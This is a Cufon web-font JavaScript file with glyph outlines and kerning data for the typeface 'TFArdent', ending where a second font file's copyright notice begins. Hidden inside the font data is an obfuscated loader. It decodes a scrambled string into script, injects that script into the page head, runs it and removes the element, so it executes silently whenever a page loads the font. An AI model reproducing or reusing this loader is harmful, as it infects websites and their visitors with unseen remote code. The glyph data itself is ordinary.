"d":"253,-255v-10,0,-24,8,-42,49r-90,206r-23,0r-25,-206v-4,-31,-8,-49,-26,-49r1,-7r67,0r-1,7v-21,0,-19,28,-17,49r21,185r77,-185v6,-16,10,-25,11,-33v2,-10,-4,-16,-13,-16r0,-7r61,0","w":212,"k":{"z":19,"y":22,"v":22,"u":22,"t":24,"s":39,"r":23,"p":14,"o":46,"m":14,"i":10,"g":41,"e":46,"a":41,"Z":7,"W":-5,"S":10,"Q":19,"O":19,"G":18,"C":18,"A":46,";":19,":":17,"\/":12,".":43,"-":41,",":43}},{"w":83},{"d":"90,-239v-1,17,-31,21,-27,0v1,-9,8,-16,14,-16v8,0,14,6,13,16xm50,-12v-13,69,-38,88,-95,82r1,-6v51,0,67,-19,75,-77v7,-52,21,-106,23,-158v-2,-7,-12,-5,-20,-5r1,-6v15,-3,30,-16,44,-13","w":72,"k":{"y":10,"x":7,"w":5,"v":5,"u":5,"t":10,"s":5,"r":7,"o":10,"k":5,"i":10,"e":10,"a":12}},{"d":"109,-268v-2,9,27,39,35,38r-1,7v-1,2,-46,-16,-45,-19v3,-10,-2,-26,11,-26","w":165},{"d":"48,44r-42,0r1,-8r24,0r49,-309r-24,0r1,-7r42,0","w":67},{"d":"177,-131v-16,104,-55,136,-94,136v-39,0,-68,-27,-51,-136v16,-104,55,-136,94,-136v39,0,68,27,51,136xm154,-131v15,-98,-3,-125,-30,-125v-27,0,-54,27,-69,125v-15,98,3,125,30,125v27,0,54,-27,69,-125","k":{"9":1,"8":10,"7":32,"5":14,"4":5,"3":22,"2":22,"1":46,"\/":3,",":7}},{"d":"169,-15v6,11,-12,14,-28,18v-15,0,-15,-19,-15,-19v0,0,-21,19,-46,19v-39,0,-68,-20,-55,-100v12,-76,48,-100,87,-100v30,0,40,18,40,18v2,-20,10,-42,7,-62v-2,-8,-12,-4,-20,-5r1,-6v15,-3,30,-16,44,-13r-36,224v-4,35,5,31,21,26xm128,-32r20,-124v0,0,-10,-30,-38,-30v-27,0,-53,18,-64,88v-10,62,9,88,36,88v26,0,46,-22,46,-22","w":167,"k":{"y":7,"w":7,"v":7,"u":5,"t":5,"q":7,"o":7,"e":7,"\/":-19}},{"d":"132,-46v-9,36,8,49,-55,49v-43,0,-62,-30,-53,-101v12,-91,73,-113,129,-90r-5,33r-7,0v2,-12,-5,-31,-33,-31v-25,0,-50,14,-62,88v-10,63,6,88,34,88v25,0,43,-17,46,-36r6,0","w":126,"k":{"z":-8,"y":-5,"x":-5,"w":-5,"v":-5,"u":-5,"t":-6,"s":-7,"r":-5,"p":-6,"n":-6,"m":-6,"l":-7,"k":-7,"j":-7,"i":-6,"h":-7,"g":-5,"f":-5,"c":-7,"b":-5,"a":-5,"\/":-18}},{"d":"196,-195v-10,66,-54,84,-127,80v-3,33,-18,68,-11,100v2,10,17,4,13,15r-62,0v-1,-12,11,-5,17,-15v5,-5,8,-11,9,-18r31,-196v3,-14,-8,-27,-20,-26r2,-7r78,0v61,0,76,27,70,67xm172,-193v5,-36,-10,-58,-48,-58v-20,0,-35,5,-35,5r-18,119v61,5,94,-15,101,-66","w":170,"k":{"y":-5,"v":-5,"s":5,"o":12,"i":-5,"g":10,"e":12,"d":12,"c":5,"a":12,"Z":5,"Y":18,"X":17,"W":7,"V":12,"T":-7,"S":-3,"R":5,"P":5,"N":5,"M":5,"L":5,"K":5,"D":7,"B":3,"A":41,";":-10,":":-10,"\/":17,".":48,"-":14,",":48}},{"d":"176,-182v-14,0,-19,7,-31,34r-82,192v-10,42,-55,49,-76,29r7,-40r6,0v-4,24,6,31,20,31v28,0,41,-42,50,-64r-5,0r-16,-148v-3,-27,-7,-34,-19,-34r1,-7r49,0r0,7v-16,1,-14,15,-13,34r14,127r53,-127v5,-13,13,-31,0,-34r1,-7r42,0","w":144,"k":{"w":-5,"s":7,"q":12,"o":12,"g":7,"e":10,"d":7,"c":10,"b":7,"a":10,";":-7,":":-14,".":39,"-":17,",":39}},{"d":"115,-26v-11,14,-24,29,-48,29v-31,0,-36,-24,-31,-54r20,-125r-23,0r2,-13r23,0r7,-46r20,-7r-9,53r55,0r-2,13r-54,0r-20,125v-3,20,-1,38,20,38v17,0,24,-6,38,-19","w":101,"k":{"z":-12,"y":-7,"x":-12,"w":-5,"v":-7,"u":-10,"s":-7,"r":-10,"q":7,"p":-10,"o":7,"n":-14,"m":-10,"l":-8,"k":-10,"j":-10,"i":-10,"h":-7,"f":-5,"c":-5,"a":-5,";":-14,":":-14,"\/":-26,".":-14,"-":12,",":-14}},{"d":"170,-124r-60,0r-12,75r-11,0r13,-75r-61,0r2,-14r61,0r11,-73r11,0r-12,73r60,0"},{"d":"106,-273r-104,297r-14,0r104,-297r14,0","w":63,"k":{"z":14,"x":7,"u":-10,"s":12,"q":19,"o":19,"k":-14,"h":-10,"Z":-12,"Y":-12,"X":-24,"W":-10,"V":-12,"U":-14,"T":-22,"S":-3,"R":-19,"Q":5,"P":-14,"O":10,"N":-14,"M":-14,"L":-14,"K":-14,"J":-12,"I":-5,"H":-3,"G":3,"F":-14,"E":-12,"D":-10,"C":7,"B":-10,"A":17,"9":-3,"8":12,"7":3,"6":10,"5":10,"4":22,"3":5,"2":3,"1":22,"0":7}},{"d":"158,-35r-122,-80r5,-29r147,-80r-2,12r-130,82r104,83"},{"d":"43,-13v-1,19,-33,23,-29,0v0,-20,32,-24,29,0","w":54,"k":{"1":29,"'":72,"\"":77}},{"d":"170,-97v-12,76,-49,100,-87,100v-39,0,-68,-20,-55,-100v12,-76,48,-100,87,-100v38,0,68,20,55,100xm149,-98v11,-70,-9,-89,-36,-89v-27,0,-53,19,-64,89v-11,71,9,90,36,90v27,0,53,-19,64,-90","w":165,"k":{"y":12,"x":12,"w":11,"v":10,"t":3,"p":7,"l":3,"k":7,"j":5,"i":3,"f":7,"b":12}},{"d":"80,-266r-17,81r-8,0r9,-81r16,0","w":59,"k":{".":67,",":65}},{"d":"193,-262r-127,262r-25,0r127,-237r-106,0r4,-25r127,0","k":{";":36,":":36,"9":26,"8":39,"7":31,"6":33,"5":39,"4":55,"3":39,"2":33,"1":55,"0":29,"\/":36,".":72,"-":46,",":62}},{"d":"124,0r-119,0r1,-6r120,-172r-22,0v-55,0,-61,7,-64,26r-6,0r6,-37r110,0r-1,8r-118,171v49,1,97,1,94,-36r6,0","w":128,"k":{"z":-7,"s":-5,"g":-5,"f":-7,"\/":-19}},{"d":"209,0r-71,0r1,-8v15,0,18,-13,13,-26r-33,-80v-20,32,-47,60,-63,95v-1,5,1,11,11,11r-1,8r-63,0r1,-7v18,0,39,-24,46,-34r63,-87r-44,-106v-5,-12,-10,-21,-26,-21r1,-7r64,0r-1,7v-15,1,-15,11,-11,22r35,83v21,-32,47,-60,64,-96v1,-6,-2,-9,-9,-9r1,-7r56,0r-1,7v-13,0,-25,6,-36,21r-70,98r44,100v2,5,16,29,30,29","w":206,"k":{"y":19,"v":29,"u":22,"t":17,"s":12,"p":14,"o":26,"m":10,"e":26,"d":19,"c":17,"a":14,"U":10,"S":7,"Q":19,"O":22,"G":19,"C":19,"A":33,"\/":-22,"-":33}},{"d":"224,-118v-2,12,-27,11,-26,33v-17,60,18,89,-85,89v-62,0,-94,-31,-77,-138v17,-106,68,-134,120,-134v46,0,65,9,65,9r-7,44r-8,0v5,-32,-12,-42,-51,-42v-34,0,-80,16,-97,123v-17,108,26,127,57,127v55,0,54,-35,62,-78v2,-14,-5,-27,-16,-26r1,-7r62,0","w":204,"k":{"Y":12,"X":12,"W":12,"V":12,"T":5,"S":-7,"P":-5,"L":-5,"J":-7,"I":-5,"C":-5,"A":11,"\/":-14,"-":-12}},{"d":"66,-159v-1,19,-33,23,-29,0v0,-19,32,-22,29,0xm45,-25v0,20,-34,21,-29,0v1,-20,32,-24,29,0","w":54,"k":{"1":43}},{"d":"161,0r-60,0v-1,-12,12,-5,18,-15v17,-30,15,-78,23,-116v8,-39,-3,-54,-25,-54v-71,0,-53,92,-69,152v-3,13,6,27,16,26r-1,7r-59,0v-1,-12,11,-5,17,-15v5,-5,8,-11,9,-18v5,-46,18,-93,19,-138v-3,-7,-11,-5,-20,-5r1,-6v15,-3,30,-16,44,-13r-5,27v0,0,21,-29,51,-29v85,2,14,125,28,182v3,10,17,4,13,15","w":159,"k":{"y":10,"w":10,"v":10,"p":4,"\/":-14,".":-5}},{"d":"183,-203v-6,37,-41,63,-67,63r-21,80r-8,0r7,-86v40,1,61,-27,65,-55v5,-32,-2,-55,-29,-55v-22,0,-45,10,-50,42r-8,0r7,-45v0,0,24,-8,60,-8v38,0,50,26,44,64xm98,-13v-1,21,-32,21,-29,0v1,-20,32,-24,29,0","w":153},{"d":"121,-238r-33,17r28,18r-7,10r-24,-23r-3,41r-10,0r8,-41r-30,23r-3,-10r32,-18r-26,-18r6,-10r23,23r4,-40r11,0r-10,40r31,-22","w":82},{"d":"177,-149r-136,0r2,-14r136,0xm169,-100r-136,0r2,-13r136,0"},{"d":"67,0r-60,0v-1,-12,11,-5,17,-15v5,-5,8,-11,9,-18r31,-198v3,-14,-7,-17,-21,-15r1,-6v15,-3,30,-16,44,-13r-37,232v-3,13,6,27,17,26","w":72,"k":{"z":7,"y":10,"x":7,"w":10,"v":5,"u":5,"t":10,"s":10,"r":10,"q":7,"p":5,"o":7,"l":-10,"i":-3,"g":7,"f":7,"e":7,"a":5}},{"d":"34,20r-11,0r47,-297r11,0","w":67},{"d":"79,31v-39,0,-63,-46,-46,-155v17,-104,56,-155,95,-155r-1,6v-27,0,-58,51,-73,149v-16,98,-1,148,26,148","w":101},{"d":"118,-95r-88,0r2,-13r88,0","w":117,"k":{"z":10,"y":22,"x":29,"w":22,"t":14,"s":10,"r":10,"p":12,"k":-5,"Z":31,"Y":69,"X":46,"W":32,"V":50,"T":59,"S":17,"R":7,"P":7,"L":10,"F":12,"E":10,"A":24,"9":10,"8":10,"7":48,"6":5,"5":24,"4":5,"3":36,"2":39,"1":58}},{"d":"141,0r-46,0v-2,-12,17,-6,10,-24r-23,-61v-15,24,-35,46,-47,72v0,3,2,5,10,5r-1,8r-44,0r1,-7v41,-13,51,-61,77,-90r-27,-70v-3,-7,-10,-15,-19,-15r1,-7r47,0v1,12,-19,5,-8,22r19,51v13,-20,30,-39,41,-61v0,-4,-3,-5,-8,-5r1,-7r41,0r-1,7v-12,0,-20,6,-26,15r-44,62r30,78v2,5,10,20,17,20","w":140,"k":{"s":5,"q":14,"o":14,"i":-7,"f":-7,"e":7,"d":7,"c":5,"a":5,"\/":-22,"-":24}},{"d":"191,-61v-9,51,8,65,-78,65v-62,0,-93,-31,-77,-138v20,-134,97,-146,180,-125r-7,44r-8,0v4,-23,-7,-42,-46,-42v-34,0,-80,16,-97,123v-17,108,26,126,57,126v51,0,64,-28,68,-53r8,0","w":195,"k":{"y":8,"o":5,"e":5,"Z":5,"Y":12,"X":7,"W":7,"V":14,"U":7,"T":3,"S":3,"Q":10,"O":10,"J":-7,"G":12,"F":3,"E":5,"D":7,"C":12,"B":7,"A":17,";":-5,":":-5,"\/":-5}},{"d":"127,-198v-8,52,-30,69,-52,69v-22,0,-40,-14,-31,-69v8,-52,31,-68,53,-68v22,0,39,14,30,68xm214,-267r-159,267r-13,0r159,-267r13,0xm211,-66v-8,52,-31,69,-53,69v-21,0,-39,-15,-30,-69v9,-52,31,-68,52,-68v22,0,40,14,31,68xm111,-198v8,-47,-3,-59,-16,-59v-14,0,-26,12,-34,59v-7,47,2,60,16,60v13,0,27,-13,34,-60xm194,-66v7,-47,-2,-59,-15,-59v-14,0,-27,12,-35,59v-7,46,3,60,16,60v13,0,27,-14,34,-60","w":212},{"d":"157,-82v-5,32,-24,55,-61,59r-7,46r-8,0v1,-14,7,-32,6,-45v-65,-5,-41,-18,-39,-54r6,0v-3,22,7,44,36,43r15,-94v-20,-13,-42,-27,-37,-60v5,-31,25,-53,55,-55r5,-31r8,0r-5,31v55,3,37,13,34,46r-6,0v4,-25,-11,-34,-30,-34r-12,80v19,13,46,25,40,68xm109,-154r12,-76v-41,3,-45,65,-12,76xm135,-78v4,-26,-8,-36,-23,-45r-14,89v20,-4,33,-21,37,-44","k":{"1":60}},{"d":"175,-97v-11,93,-82,117,-130,85v-1,25,-22,70,9,76r-1,7r-60,0v1,-13,23,-11,26,-32r31,-201v3,-13,-8,-15,-21,-14r1,-6v14,-3,31,-16,44,-13r-4,26v0,0,22,-28,52,-28v27,0,64,10,53,100xm154,-98v10,-66,-9,-85,-36,-85v-38,0,-53,47,-55,60r-15,94v12,15,24,19,42,19v26,0,54,-22,64,-88","w":167,"k":{"y":12,"x":7,"w":10,"v":7,"q":-5,"p":3,"o":-5,"k":5,"f":7,"d":-5,"c":-10,"b":7}},{"d":"162,0r-153,0v-1,-12,11,-5,17,-15v5,-5,8,-11,9,-18r31,-196v3,-12,-6,-27,-17,-26r1,-7r146,0r-8,52r-8,0v5,-32,3,-42,-48,-42v-31,0,-43,5,-44,14r-15,93v48,1,67,-7,69,-39r7,0r-14,89r-7,0v8,-32,-8,-41,-56,-40r-15,95v-3,17,6,28,39,28v46,0,62,-8,69,-52r7,0","w":165,"k":{"\/":-22,".":-7,"-":12}},{"d":"153,-69v-7,45,-38,74,-76,74v-32,0,-53,-9,-53,-9r7,-44r8,0v-5,32,18,42,39,42v27,0,47,-31,52,-63v6,-43,-11,-67,-54,-65v2,-5,-1,-14,8,-12v38,0,59,-30,63,-57v5,-32,-3,-53,-30,-53v-22,0,-45,10,-50,42r-8,0r8,-45v0,0,20,-8,56,-8v38,0,53,23,47,61v-5,38,-44,64,-65,67v34,0,54,29,48,70","k":{"9":24,"8":26,"7":48,"6":24,"5":39,"4":22,"3":43,"2":36,"1":65,"0":19,"\/":12,".":22,"-":17,",":19}},{"d":"162,0r-58,0v-1,-10,9,-6,11,-14v-7,-34,-35,-64,-50,-94r-6,5v-2,29,-16,61,-8,88v4,10,16,4,12,15r-59,0v-1,-12,11,-5,17,-15v5,-5,8,-11,9,-18r31,-198v3,-14,-7,-16,-21,-15r1,-6v15,-3,30,-16,44,-13r-24,151r72,-65v0,0,-8,-3,-13,-3r1,-7r56,0r-1,7v-36,8,-66,44,-96,62r48,79v18,30,25,34,35,34","w":144,"k":{"z":-7,"y":-7,"x":-12,"u":-3,"t":-5,"s":-5,"r":-10,"q":7,"p":-7,"o":7,"n":-14,"m":-12,"j":-7,"i":-10,"f":-7,"e":7,"a":-5,";":-22,":":-22,"\/":-41,".":-26,"-":24,",":-26,"!":-14}},{"d":"66,-159v-1,19,-33,23,-29,0v0,-19,32,-22,29,0xm31,-34v28,10,-7,94,-20,84v0,0,23,-37,16,-50v0,0,-15,-1,-12,-18v1,-10,7,-16,16,-16","w":54},{"d":"85,-113v62,17,51,121,-29,116v-62,-4,-40,-14,-39,-49r6,0v-3,19,7,38,35,38v26,0,42,-15,46,-40v9,-57,-79,-41,-69,-99v5,-29,28,-50,59,-50v57,0,42,9,38,42r-6,0v4,-24,-12,-32,-33,-32v-26,0,-36,16,-39,34v-4,23,13,30,31,40","w":120,"k":{"z":-3,"w":3,"v":3,"t":3,"c":-7,"b":3,"a":-7,"\/":-14}},{"d":"48,44r-42,0r51,-324r42,0r-1,8r-23,0r-49,308r23,0","w":67},{"d":"226,-131v-17,104,-64,136,-117,136v-52,0,-91,-27,-74,-136v17,-104,65,-136,117,-136v53,0,91,27,74,136xm203,-131v15,-98,-13,-125,-53,-125v-40,0,-77,27,-92,125v-15,98,13,125,53,125v40,0,77,-27,92,-125","w":218,"k":{"Y":22,"X":22,"W":17,"V":17,"U":3,"T":10,"S":-3,"A":24,";":-10,":":-10,"\/":3,".":31,",":31}},{"d":"152,-118v9,7,-10,19,-13,28v-33,51,-68,-63,-102,0v-9,-8,10,-19,13,-29v34,-49,68,61,102,1","w":159},{"d":"170,-115r-147,80r2,-12r131,-83r-105,-82r2,-12r122,80"},{"d":"73,-141r-20,81r-8,0v4,-72,15,-137,26,-202r21,0xm56,-13v-1,19,-33,23,-29,0v1,-20,32,-24,29,0","w":78},{"d":"209,-208r-8,0v9,-38,-15,-42,-61,-41r-34,214v-4,16,6,30,19,28r-1,7r-68,0v-1,-13,14,-5,20,-15v5,-5,8,-13,9,-20r34,-214v-47,-1,-73,3,-75,41r-8,0r9,-54r173,0","w":178,"k":{"z":24,"y":14,"x":17,"w":14,"v":14,"u":14,"s":41,"r":19,"p":14,"o":40,"n":12,"m":14,"g":42,"e":39,"d":31,"c":37,"a":39,"Z":5,"Y":3,"V":5,"T":-7,"S":-3,"R":5,"Q":14,"O":14,"N":5,"M":5,"G":12,"C":14,"A":32,";":19,":":19,"\/":5,".":41,"-":59,",":41}},{"d":"62,44v-30,1,-43,0,-36,-41r17,-108v1,-9,-6,-9,-12,-9r0,-7v7,0,15,-2,16,-10r17,-108v9,-39,16,-43,49,-41r-1,7v-19,0,-25,10,-30,39r-15,98v0,12,-14,13,-16,20v6,0,11,8,10,17r-16,97v-5,29,-1,38,18,38","w":73},{"d":"189,-75v-17,90,-89,74,-178,75v-1,-12,11,-5,17,-15v5,-5,8,-11,9,-18r31,-196v3,-13,-7,-27,-19,-26r1,-7v68,3,158,-18,145,59v-7,43,-42,60,-64,62v22,3,69,6,58,66xm174,-203v3,-25,-7,-48,-49,-48v-19,0,-34,5,-34,5r-16,100v58,4,94,-11,99,-57xm166,-73v9,-43,-32,-68,-93,-61r-14,95v-3,17,8,28,36,28v32,0,62,-16,71,-62","w":187,"k":{"o":3,"Z":12,"Y":36,"X":24,"W":29,"V":36,"U":14,"T":10,"S":3,"R":12,"Q":7,"P":10,"O":7,"N":14,"M":14,"L":12,"K":12,"J":3,"I":12,"H":10,"G":5,"F":7,"E":7,"D":12,"C":5,"B":12,"A":24,"\/":-5,".":19,"-":-12,",":14}},{"d":"182,-176v-30,-2,-27,22,-31,47v-7,39,-26,70,-69,70v-39,0,-43,2,-45,15v-1,16,33,13,52,13v36,0,59,14,53,55v-7,44,-54,61,-80,61v-38,0,-70,-12,-62,-58v5,-30,31,-45,31,-45v0,0,-16,-6,-13,-26v2,-13,14,-24,32,-24v0,0,-22,-13,-14,-61v8,-52,37,-68,68,-68v29,0,43,13,46,32v4,-22,11,-36,35,-32xm131,-128v8,-47,-10,-57,-28,-57v-21,0,-39,10,-47,57v-7,45,8,57,29,57v20,0,39,-12,46,-57xm122,27v11,-42,-40,-42,-84,-40v0,0,-15,19,-18,40v-6,37,17,48,44,48v20,0,49,-12,58,-48","w":150,"k":{"y":-5,"t":-5,"r":-5,"o":5,"j":-17,"g":-5,"e":5,"\/":-17}},{"d":"111,-255v-22,-1,-19,25,-18,49r13,185r80,-234r20,0r8,234r81,-218v4,-19,-12,-10,-8,-23r57,0r-1,7v-17,0,-28,8,-44,49r-81,206r-25,0r-8,-214r-73,214r-26,0r-17,-206v-3,-32,-9,-49,-27,-49r2,-7r68,0","w":304,"k":{"y":19,"u":24,"t":19,"s":36,"r":29,"p":22,"o":39,"n":22,"m":26,"l":5,"k":7,"i":14,"h":7,"e":39,"d":31,"a":39,"Z":12,"U":19,"S":14,"Q":22,"O":23,"G":23,"C":23,"A":43,";":22,":":14,"\/":29,".":50,"-":32,",":50}},{"d":"153,-226r-5,0v3,-18,-10,-31,-27,-31v-28,0,-36,31,-41,68r52,0r-1,13r-53,0r-23,143v-1,15,4,27,21,26r-1,7r-64,0v-1,-12,11,-5,17,-15v5,-5,8,-11,9,-18r22,-143r-23,0r3,-13r23,0v6,-70,53,-92,97,-70","w":98,"k":{"z":-12,"y":-17,"x":-14,"v":-17,"u":-19,"t":-14,"r":-12,"q":12,"p":-19,"o":12,"n":-22,"m":-14,"l":-24,"k":-19,"j":-7,"i":-8,"h":-19,"e":8,"d":6,"b":-19,"a":5,";":-18,":":-18,"\/":-12,".":8,"-":5,",":1}},{"d":"114,0r-70,0v1,-14,31,-8,30,-33r33,-209r-31,11r2,-12r54,-24r-37,234v-4,15,8,27,21,26","k":{"s":65,"p":55,"a":67,":":60,"9":69,"8":79,"7":86,"6":69,"5":75,"4":79,"3":79,"2":65,"1":90,"0":60,"\/":31,".":60,"-":69,",":60,"'":82,"\"":77}},{"d":"222,-132v-22,129,-83,139,-208,132v-1,-12,11,-5,17,-15v5,-5,8,-11,9,-18r31,-196v3,-13,-8,-27,-19,-26r1,-7v113,-4,191,-5,169,130xm199,-132v18,-104,-35,-128,-105,-112r-32,198v-5,29,6,34,34,34v53,0,88,-33,103,-120","w":210,"k":{"Z":12,"Y":29,"X":24,"W":24,"V":24,"U":7,"T":10,"R":5,"Q":-3,"P":7,"O":-3,"N":7,"M":10,"L":7,"K":7,"J":3,"I":5,"H":7,"G":-5,"F":10,"E":5,"D":10,"C":-5,"B":5,"A":24,";":-12,":":-12,"\/":3,".":24,"-":-14,",":24}},{"d":"164,0r-155,0v-1,-12,11,-5,17,-15v5,-5,8,-11,9,-18r31,-196v3,-12,-6,-27,-17,-26r1,-7r63,0v1,12,-11,5,-18,15v-4,6,-7,11,-8,18r-30,190v-2,14,6,26,38,26v43,0,65,-7,72,-52r7,0","w":165,"k":{"y":14,"w":14,"v":14,"t":7,"g":-5,"b":7,"a":-5,"Y":41,"X":10,"W":41,"V":41,"U":22,"T":33,"S":-5,"R":5,"Q":14,"P":5,"O":14,"N":5,"M":5,"L":7,"K":5,"J":5,"H":5,"G":14,"F":5,"E":5,"D":5,"C":14,"A":10,"\/":-22,".":-7}},{"d":"191,-209r-7,0v5,-32,-1,-42,-53,-42v-31,0,-42,5,-43,14r-15,92v48,1,67,-7,69,-39r7,0r-14,89r-7,0v8,-32,-8,-41,-56,-40v-4,40,-20,81,-14,120v2,10,19,3,14,15r-63,0v-1,-12,11,-5,17,-15v5,-5,8,-11,9,-18r31,-196v3,-12,-6,-27,-17,-26r1,-7r150,0","w":154,"k":{"y":6,"x":10,"w":7,"u":5,"s":19,"r":12,"o":22,"j":-7,"e":17,"d":13,"a":22,"Z":-3,"Y":-5,"X":-7,"W":-10,"T":-14,"S":-5,"R":-5,"Q":5,"P":-5,"O":5,"L":-5,"K":-5,"J":-5,"I":-5,"H":-7,"G":3,"F":-5,"E":-7,"D":-7,"C":3,"B":-7,"A":36,"\/":5,".":33,"-":12,",":39}},{"d":"255,0r-62,0v-1,-12,11,-5,17,-15v5,-5,7,-11,8,-18r32,-200r-114,218r-14,0r-42,-222r-32,204v-3,14,5,27,16,26r-1,7r-54,0v-1,-12,11,-5,17,-15v5,-5,8,-11,9,-18r31,-196v3,-12,-6,-27,-17,-26r1,-7r48,0r41,216r111,-216r46,0v1,12,-10,6,-17,15v-4,6,-8,11,-9,18r-31,196v-3,13,6,27,17,26","w":261,"k":{"y":7,"t":5,"s":10,"o":12,"l":-5,"g":5,"e":10,"c":7,"a":7,"W":5,"R":-5,"P":-5,"E":-5,"D":-5,"B":-5,"\/":-14}},{"d":"201,0r-34,0r-94,-143v-4,42,-21,86,-15,128v2,10,17,4,13,15r-62,0v-1,-12,11,-5,17,-15v5,-5,8,-11,9,-18r31,-196v3,-12,-6,-27,-17,-26r1,-7r62,0v1,12,-11,5,-17,15v-17,25,-14,67,-22,101r97,-83v10,-7,20,-25,1,-26r1,-7r63,0r-1,7v-44,13,-98,76,-137,103r86,130v4,10,23,10,18,22","w":194,"k":{"z":5,"y":19,"w":14,"v":14,"u":17,"t":12,"s":12,"r":7,"p":12,"o":19,"n":7,"l":-7,"k":-7,"h":-7,"e":19,"a":11,"Z":5,"Y":24,"X":-5,"W":14,"V":26,"U":17,"T":-3,"S":7,"Q":19,"P":-5,"O":19,"N":-3,"M":-5,"L":-7,"J":-3,"I":-5,"G":19,"F":-3,"E":-3,"D":-5,"C":19,"B":-7,"A":24,";":-7,":":-3,"\/":-30,".":-12,"-":26,",":-12,"!":5}},{"d":"167,-82v-10,63,-48,87,-83,87v-57,0,-60,-59,-48,-136v19,-127,69,-150,148,-128r-7,45r-8,0v4,-27,-8,-42,-34,-42v-33,0,-59,19,-77,133v0,0,17,-41,58,-41v39,0,59,31,51,82xm144,-79v9,-54,-9,-73,-34,-73v-25,0,-48,23,-56,73v-8,49,8,73,33,73v25,0,48,-19,57,-73","k":{"9":14,"8":14,"7":33,"6":10,"5":26,"4":12,"3":29,"2":22,"1":55,"0":5,"\/":3,".":5,"-":5,",":7}},{"d":"161,0r-60,0v-1,-12,12,-5,18,-15v17,-30,15,-78,23,-116v8,-39,-3,-54,-25,-54v-71,0,-53,92,-69,152v-3,13,6,27,16,26r-1,7r-59,0v-1,-12,11,-5,17,-15v5,-5,8,-11,9,-18r31,-198v3,-14,-7,-16,-21,-15r1,-6v15,-3,30,-16,44,-13r-16,97v0,0,21,-29,51,-29v85,2,14,125,28,182v3,10,17,4,13,15","w":159,"k":{"z":3,"y":10,"x":7,"w":12,"v":10,"t":5,"f":12,"e":3,"b":5,"a":3,"\/":-12}},{"d":"31,-34v28,10,-7,94,-20,84v0,0,23,-37,16,-50v0,0,-15,-1,-12,-18v1,-10,7,-16,16,-16","w":54,"k":{"1":31,"'":77,"\"":77}},{"d":"159,-80v-9,54,-46,85,-84,85v-31,0,-52,-9,-52,-9r8,-44r8,0v-5,32,18,42,32,42v31,0,55,-20,65,-70v12,-58,-42,-79,-86,-56r21,-130r103,0r-7,25r-90,0r-14,87v0,0,14,-4,32,-4v53,0,71,32,64,74","k":{"9":29,"8":26,"7":46,"6":22,"5":41,"4":24,"3":41,"2":36,"1":68,"0":17,"\/":10,".":14,"-":12,",":19}},{"d":"158,-65v-8,54,-46,70,-77,70v-32,0,-64,-14,-55,-70v6,-40,34,-68,66,-68v-23,-5,-40,-27,-34,-68v8,-50,41,-66,69,-66v29,0,55,13,47,66v-5,28,-26,54,-52,60v23,13,43,32,36,76xm152,-201v6,-40,-6,-55,-27,-55v-23,0,-39,17,-45,53v-7,42,26,55,31,55v19,0,37,-26,41,-53xm135,-65v0,-87,-75,-71,-86,0v-7,43,10,59,33,59v23,0,53,-15,53,-59","k":{"9":17,"8":22,"7":39,"6":17,"5":31,"4":24,"3":33,"2":29,"1":54,"0":12,"\/":3,".":12,"-":12,",":10}},{"d":"150,-131r-7,0r-37,-110r-71,109r-7,0r72,-130r18,0","w":136},{"d":"170,-131v-19,126,-75,151,-152,127r6,-44r9,0v-4,27,8,42,34,42v33,0,63,-21,81,-133v0,0,-17,41,-58,41v-39,0,-60,-32,-52,-83v10,-63,49,-86,84,-86v57,0,60,59,48,136xm152,-184v8,-49,-9,-72,-34,-72v-25,0,-47,18,-56,72v-9,54,8,73,33,73v25,0,49,-23,57,-73","k":{"9":10,"8":19,"7":41,"6":10,"5":26,"4":19,"3":33,"2":31,"1":59,"0":5,"\/":10,".":12,"-":7,",":19}},{"d":"137,64r-147,0r2,-11r147,0","w":145},{"d":"211,0r-67,0r1,-7v20,0,20,-28,17,-49r-6,-57r-69,0v-10,27,-29,62,-34,90v-1,10,5,16,14,16r-1,7r-61,0r1,-7v10,0,23,-8,41,-49r91,-206r23,0r24,206v4,30,9,49,27,49xm154,-128r-13,-113r-47,113r60,0","w":211,"k":{"z":5,"y":24,"x":22,"w":26,"v":26,"u":12,"t":19,"s":12,"r":17,"q":14,"p":10,"o":14,"g":10,"f":22,"e":14,"d":14,"c":14,"b":14,"a":14,"Y":39,"X":22,"W":39,"V":39,"U":24,"T":22,"S":6,"Q":22,"O":22,"G":22,"C":22,"A":23,";":-3,":":3,"\/":-23,".":-7,"-":19,",":-7}}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+152-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("4z|De!k0Ou>d4WcRT!@ELzL>v}kD|!>dv}9EOuiM|oa){J06TocE^JiO{uo#vWc4^cF!t3c#L6Q6bM@*e^[>TEkoTc|#Tt1N{tQK{@0N|zkx5vx?vWaaw!aMk;*{iJ*dpEP>e2NPwv[I9GiNitk?f;ket;SVLoiRx!Tv|~@1QWIF@z2L94wbkfpxiGt^ouv{|Oe#T5`A[6~3c!MP*K?)hd=NCEJ0D};S.,Ra>V8FtF|kGJ|PwI^Sv~c`xGLd#;Q)OvxPL6L*wz3>bWCNpuLd#WC)pv1dezod|;iPwz#>{6.!w!T)5vQP#JDR`th*|6[6w!>?pG>54Ia,T;T;vWS*pEA8fMiP#!o[|2kJT2c)Ou.MvW.he;9c{;9c{vi*T!c05oNd{}>#wMo?`2iP#!o[|2kJT2c)Ou.MvW.~eDNdTuhaTz[E|u@3#DNdeuk#w!C={}@)4Gx=OG.0|vk04zC={}@0Ou>dw![=#;id{uDc4Gc!e;LPf}3aeI)?4}3*|Dh~u}cTvtDNu}cT`G3P4G1A")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":168,"face":{"font-family":"TFArdent","font-weight":500,"font-style":"italic","font-stretch":"normal","units-per-em":"360","panose-1":"0 0 0 0 0 0 0 0 0 0","ascent":"288","descent":"-72","x-height":"3","bbox":"-52 -280.412 344 85","underline-thickness":"4.68","underline-position":"-29.88","slope":"-12","stemh":"11","stemv":"24","unicode-range":"U+0020-U+007E"}}));



/* Source File: tfardent.font2.js */

/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copr.1991-93, Joseph Treacy,Treacyfaces,Inc. V.12, completed 1.26.93.
